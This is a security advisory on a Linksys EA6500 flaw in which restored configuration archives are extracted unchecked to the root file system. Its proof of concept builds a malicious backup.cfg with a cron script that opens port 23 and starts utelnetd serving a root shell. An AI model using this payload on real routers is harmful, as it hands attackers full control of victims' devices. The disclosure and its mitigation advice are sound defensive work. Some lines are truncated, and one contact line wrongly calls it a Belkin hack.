Compromising the Linksys EA6500
[return to summary]
The Linksys EA6500 does not properly validate backed-up
configuration files that are restored through the web management
interface. If a device administrator can be fooled into restoring a
malicious configuration file, an attacker can create or overwrite
arbitrary files on the EA6500's file system, and obtain remote, root
- The victim must be fooled in to logging in to the EA6500's web
interface and restoring a malicious configuration file.
Backup configuration files for the Linksys EA6500 contain a tar.gz
archive file, and upon restoration, the device extracts the archive to
the root of the file system. By including a telnet daemon, and a cron
script that starts the daemon, an attacker can gain root shell access
to the router.
Vulnerable Firmware is 18.104.22.168876
Other versions of the firmware were not tested.
A successful attack exploiting this vulnerability can give a remote adversary full control over the victim router.
Recommendations to the vendor
- Configuration files should be validated before they are restored
to the router.
- Configuration files should contain only data that is carefully
parsed by the router, and not arbitrary files that are extracted to
the file system.
Recommendations to device administrators
- (4/13/2013) There is not currently an available firmware upgrade that will remedy this vulnerability.
- Never restore a configuration file from an untrusted source.
- Take additional preventative measures and precautions by following the steps outlined on our summary page here.
Proof of Concept
- Create the necessary directory structure:
mkdir -p tmp/cron/cron.everyminute
- Write the script shown in Figure 1 to the file
tmp/cron/cron.everyminute/utelnetd.sh, and set 755
- Download the utelnetd source code from the Internet,
cross-compile a statically linked version for the mipsel
architecture, and write it to
tmp/utelnetd, with 755
- Archive the files to a tar.gz file:
tar -czpvf backup.tar.gz --owner=root --group=root \
- Add the header necessary for the router to process as a
echo -e '0x0002\n'`stat -c %s backup.tar.gz` | \
cat - backup.tar.gz > backup.cfg
- Provide the resulting backup.cfg file to the victim.
Figure 1. Script to open
port 23 to the Internet and start a Telnet server.
/sbin/iptables -I INPUT -p tcp --dport 23 -j ACCEPT
/tmp/utelnetd -l /bin/sh
- Utelnetd on Sourceforge
- CVE-2013-3064: Unvalidated URL Redirect
- CVE-2013-3065: DOM Cross-Site Scripting
- CVE-2013-3066: Information Disclosure
- Discovered By: Jacob Thompson – Security Analyst @ Independent Security Evaluators
- Exploited By: Jacob Thompson – Security Analyst @ Independent Security Evaluators
- For more information on this particular Belkin hack, you can contact us at
- Alternatively, for more general information on ISE, you can reach us using